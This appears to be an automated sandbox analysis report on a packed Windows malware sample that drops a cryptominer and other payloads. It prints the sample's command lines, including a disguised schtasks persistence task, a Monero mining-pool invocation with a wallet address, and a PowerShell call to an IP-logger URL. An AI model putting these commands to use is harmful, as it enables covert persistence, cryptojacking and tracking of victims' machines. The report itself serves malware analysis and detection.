                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Writes or reads registry keys via WMI
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMI
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00401544 GetProcAddress,NtCreateSection,memset,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00401502 NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B7507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BB2F1 NtQueryVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeCode function: 4_2_0372C3D0
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeCode function: 4_2_0372EC5A
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BB0CC
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B23FC
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B936B
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004365D0
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00417130
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00416350
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_0042A330
                  Source: 8TD8GfTtaW.exeStatic PE information: invalid certificate
                  Source: nulhfhsi.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: cpu.exe.6.drStatic PE information: Number of sections : 13 > 10
                  Source: nulhfhsi.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Chrome updater.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Chrome updater.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: 8TD8GfTtaW.exeBinary or memory string: OriginalFilename vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.268352311.0000000001394000.00000020.00020000.sdmpBinary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274119468.0000000006140000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exeBinary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: Process Memory Space: conhost.exe PID: 5544, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 37.2.Chrome updater.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: 25.2.revs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: Chrome updater.exe.25.drStatic PE information: Section: ZLIB complexity 0.995197233607
                  Source: WinRing0x64.sys.6.drBinary string: \Device\WinRing0_1_2_0
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@37/49@16/12
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B82EB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00402138 CoCreateInstance,MultiByteToWideChar,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004365D0 LocalAlloc,CreateTimerQueue,GetTickCount,ZombifyActCtx,GetCompressedFileSizeA,VirtualProtect,MapUserPhysicalPages,CreateJobObjectW,RtlAllocateHeap,GetFileAttributesA,LoadResource,RtlSizeHeap,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile created: C:\Users\user\AppData\Local\nulhfhsi.exe
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeMutant created: \Sessions\1\BaseNamedObjects\QWERTYUIOPASDFGHJKLZXCVBNM1234567890
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6692.tmp
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: 8TD8GfTtaW.exeVirustotal: Detection: 43%
                  Source: unknownProcess created: C:\Users\user\Desktop\8TD8GfTtaW.exe 'C:\Users\user\Desktop\8TD8GfTtaW.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                  Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: 8TD8GfTtaW.exeStatic file information: File size 2649312 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: 8TD8GfTtaW.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x281a00
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp

                  Data Obfuscation:

                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeUnpacked PE file: 0.2.8TD8GfTtaW.exe.1390000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeUnpacked PE file: 4.2.nulhfhsi.exe.3b0000.0.unpack :ER; :R; :R;.idata:W;.apk0:R;.themida:EW;.boot:ER;.apk1:ER;.apk2:ER;.reloc:R;.rsrc:R; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeUnpacked PE file: 6.2.lxoqz3o0.exe.f0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeUnpacked PE file: 14.2.RantimeBroker.exe.1130000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeUnpacked PE file: 25.2.revs.exe.400000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeUnpacked PE file: 31.2.jo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exeUnpacked PE file: 37.2.Chrome updater.exe.400000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeUnpacked PE file: 31.2.jo.exe.400000.0.unpack
                  Binary contains a suspicious time stamp
                  Source: initial sampleStatic PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
Source: C:\Users\user\AppData\Local\Temp\jo.exe Code function: 31_2_00412560 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: initial sample Static PE information: section where entry point is pointing to: .boot
Source: hello_C# (2).exe.22.dr Static PE information: real checksum: 0x0 should be: 0x48f6
Source: hello_C#.exe.22.dr Static PE information: real checksum: 0x0 should be: 0x48f6
Source: Chrome updater.exe.25.dr Static PE information: real checksum: 0x463d62 should be: 0x46ee7e
Source: lxoqz3o0.exe.0.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: RantimeBroker.exe.6.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: 8TD8GfTtaW.exe Static PE information: real checksum: 0x28a5e8 should be: 0x2888e7
Source: 8TD8GfTtaW.exe Static PE information: section name:
Source: 8TD8GfTtaW.exe Static PE information: section name:
Source: 8TD8GfTtaW.exe Static PE information: section name:
Source: 8TD8GfTtaW.exe Static PE information: section name: .themida
Source: 8TD8GfTtaW.exe Static PE information: section name: .boot
Source: nulhfhsi.exe.0.dr Static PE information: section name:
Source: nulhfhsi.exe.0.dr Static PE information: section name:
Source: nulhfhsi.exe.0.dr Static PE information: section name:
Source: nulhfhsi.exe.0.dr Static PE information: section name: .apk0
Source: nulhfhsi.exe.0.dr Static PE information: section name: .themida
Source: nulhfhsi.exe.0.dr Static PE information: section name: .boot
Source: nulhfhsi.exe.0.dr Static PE information: section name: .apk1
Source: nulhfhsi.exe.0.dr Static PE information: section name: .apk2
Source: lxoqz3o0.exe.0.dr Static PE information: section name:
Source: lxoqz3o0.exe.0.dr Static PE information: section name:
Source: lxoqz3o0.exe.0.dr Static PE information: section name:
Source: lxoqz3o0.exe.0.dr Static PE information: section name: .themida
Source: lxoqz3o0.exe.0.dr Static PE information: section name: .boot
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
